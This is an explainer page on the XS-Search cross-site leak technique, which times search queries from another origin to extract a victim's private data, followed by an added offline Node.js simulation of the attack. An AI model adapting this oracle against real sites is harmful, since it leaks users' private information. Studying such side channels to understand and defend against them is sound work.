XS-Search

October 1, 2020

Cross-site search (XS-Search) is an important attack principle in the family of XS-Leaks. It abuses query-based search systems to leak user information from an attacker-controlled origin [1] [2]. The original attack uses timing measurements to detect whether or not a search query returns results, and works as follows:

  1. Establish a baseline of the time needed for a request that returns results (hit), and a baseline for the time needed by a request with no results (miss).
  2. Start a timing attack on the request to the search endpoint, brute-forcing the first character of the secret (?q=r).
  3. If the measurement is consistent with the hit baseline, the character is part of the secret: keep it and add one more character (?q=ra); otherwise try a different character (?q=s).
  4. Repeating this, the full secret (?q=secret) can be leaked.

To be accurate, this attack requires many repeated timing measurements per query; the number needed can be reduced with inflation techniques (making the hit and miss responses differ more in time) and with statistical analysis of the samples. Furthermore, instead of brute-forcing the secret letter by letter, attackers can search for specific words or sentences to leak only whether or not they occur in the user's data.
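The following is an added example, not code from the XS-Leaks wiki: a self-contained Node.js simulation of both the character-by-character extraction above (steps 1 to 4) and the word-occurrence variant. The victim search endpoint, its latencies and the attacker's timing oracle are all constructed here so that the script runs offline; in a real attack, `simulatedSearchLatencyMs` would be replaced by the measured time of a cross-origin `fetch()` or frame load of `?q=...`, and the secret, the latency figures and the jitter are assumptions chosen for the simulation.

```javascript
// Added example (not part of the original page): simulated XS-Search timing attack.

// Constructed victim state: the secret the attacker wants to extract.
const VICTIM_SECRET = "secret";

// Deterministic PRNG (mulberry32) so the noisy timings are reproducible.
function makeRng(seed) {
  return function () {
    seed = (seed + 0x6d2b79f5) | 0;
    let t = Math.imul(seed ^ (seed >>> 15), 1 | seed);
    t = (t + Math.imul(t ^ (t >>> 7), 61 | t)) ^ t;
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}
const rng = makeRng(1337);

// Constructed search endpoint: a prefix query is a "hit" when the stored
// secret starts with it. Rendering results is assumed to be slower (~70 ms)
// than an empty result page (~20 ms); both carry +/-10 ms of jitter.
// In a real attack this function is the wall-clock time of a cross-origin
// request to the victim's search URL with ?q=<query>.
function simulatedSearchLatencyMs(query) {
  const hit = VICTIM_SECRET.startsWith(query);
  const base = hit ? 70 : 20;
  return base + (rng() - 0.5) * 20;
}

// Timing oracle: repeat the request and take the median, which tolerates
// outliers (GC pauses, network hiccups) far better than a single sample.
function measure(query, samples = 9) {
  const t = [];
  for (let i = 0; i < samples; i++) t.push(simulatedSearchLatencyMs(query));
  t.sort((a, b) => a - b);
  return t[Math.floor(t.length / 2)];
}

// Step 1: baselines for a known hit and a known miss. The empty query
// matches everything; a string that cannot occur in the data is a sure miss.
function calibrate() {
  return { hit: measure(""), miss: measure("\u0000no-such-result\u0000") };
}

// Classify a measurement by which baseline it is closer to.
function isHit(latency, baselines) {
  return Math.abs(latency - baselines.hit) < Math.abs(latency - baselines.miss);
}

// Steps 2 to 4: grow the known prefix one character at a time. Each round
// tries the alphabet and keeps the first character whose timing looks like
// a hit; when no extension hits, the secret is complete.
function extractSecret(alphabet = "abcdefghijklmnopqrstuvwxyz", maxLen = 32) {
  const baselines = calibrate();
  let known = "";
  while (known.length < maxLen) {
    let found = null;
    for (const ch of alphabet) {
      if (isHit(measure(known + ch), baselines)) { found = ch; break; }
    }
    if (found === null) break;
    known += found;
  }
  return known;
}

// Variant from the text: instead of brute-forcing characters, ask whether a
// whole word or phrase yields results, leaking one bit per query.
function wordOccurs(word) {
  return isHit(measure(word), calibrate());
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("extracted:", extractSecret());
  console.log("'secret' occurs:", wordOccurs("secret"));
}
```

The median of nine samples is the simplest form of the statistical analysis mentioned above; against a real endpoint the number of samples has to grow with the network jitter, and the hit/miss gap can be widened with inflation techniques such as requesting a query that forces the server to render many results.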

...